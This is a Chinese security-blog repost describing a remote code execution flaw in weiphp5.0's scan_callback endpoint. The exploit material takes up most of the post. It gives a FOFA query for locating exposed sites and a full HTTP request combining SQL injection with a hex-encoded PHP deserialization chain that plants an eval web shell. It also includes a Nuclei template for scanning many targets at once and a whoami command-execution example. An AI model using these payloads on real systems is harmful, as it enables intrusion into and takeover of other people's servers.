CTF导航 CTF导航

weiphp5.0 scan_callback 代码执行漏洞

渗透技巧 2个月前 admin
26 0 0

weiphp5.0 scan_callback 代码执行漏洞


weiphp5.0 scan_callback 代码执行漏洞

     漏洞简介

weiphp5.0 scan_callback 代码执行漏洞
weiphp5.0 scan_callback 代码执行漏洞

SPRING HAS ARRIVED



weiphp5.0 scan_callback 存在代码执行漏洞

weiphp5.0 scan_callback 代码执行漏洞

      漏洞复现

weiphp5.0 scan_callback 代码执行漏洞
weiphp5.0 scan_callback 代码执行漏洞

SPRING HAS ARRIVED

weiphp5.0 scan_callback 代码执行漏洞

第一步、使用以下fofa语句进行资产收集…确认测试目标

fofa语句(body="content="WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")

第二步、使用burp抓取数据包发送到Repeater中修改以下数据包进行测试


POST /public/index.php/weixin/Notice/index?img=echo+md5(123);exit(); HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 1340Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
<xml><product_id>aaaa</product_id><appid>exp</appid><appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid><mch_id>aaa</mch_id><nonce_str>aaa</nonce_str><openid>aaa</openid></xml>

weiphp5.0 scan_callback 代码执行漏洞

第三步、使用md5解密

weiphp5.0 scan_callback 代码执行漏洞


weiphp5.0 scan_callback 代码执行漏洞

       批量脚本

weiphp5.0 scan_callback 代码执行漏洞
weiphp5.0 scan_callback 代码执行漏洞

SPRING HAS ARRIVED

weiphp5.0 scan_callback 代码执行漏洞


id: weiphp-cms-scan_callback-rce
info:  name: weiphp-cms-scan_callback-rce  author: unknow  severity: critical  description: weiphp5.0 scan_callback 存在代码执行漏洞。  tags: weiphp,rce  metadata:    fofa-query: (body="content="WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")http:  - raw:      - |        POST /public/index.php/weixin/Notice/index?img={{rce}}exit(); HTTP/1.1        Host:         Content-Type: application/x-www-form-urlencoded
        <xml>        <product_id>aaaa</product_id>        <appid>exp</appid>        <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>        <mch_id>aaa</mch_id>        <nonce_str>aaa</nonce_str>        <openid>aaa</openid>        </xml>
    payloads:      rce:        - "echo+md5(123);"
    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code_1==500 && contains(body_1, "202cb962ac59075b964b07152d234b70") && contains(header_1, "text/html")'
#执行:echo+md5(123);system('whoami');

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!

weiphp5.0 scan_callback 代码执行漏洞

原文始发于微信公众号(揽月安全团队):weiphp5.0 scan_callback 代码执行漏洞

版权声明:admin 发表于 2024年3月13日 上午8:51。
转载请注明:weiphp5.0 scan_callback 代码执行漏洞 | CTF导航

相关文章

某微1day后台RCE审计漏洞
admin
582
FINDING DESERIALIZATION BUGS IN THE SOLARWIND PLATFORM
admin
152
第32篇:某运营商链路劫持(被挂博彩页)溯源异常路由节点(上篇)
admin
309
Docker-remoter-api渗透
admin
718
CVE-2021-1585
admin
938
Citrix ADC & Citrix Gateway远程代码执行漏洞(CVE-2023-3519)
admin
623

相关文章

Ghidra RCE 漏洞分析
0
每日安全动态推送(4-29)
0
Jumpserver 数据恢复之所有服务器权限
0
每日安全动态推送(4-28)
0
[代码审计] 某盗U/发卡系统 不知道是几day
0
Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0
How Did I Easily Find Stored XSS at Apple And Earn $5000 ?
0
How I Discovered an RCE Vulnerability in Tesla, Securing a $10,000 Bounty
0
pgAdmin 8.3 Remote Code Execution
0
How I Prevented a Mass Data Breach – $15,000 bounty – @bxmbn
0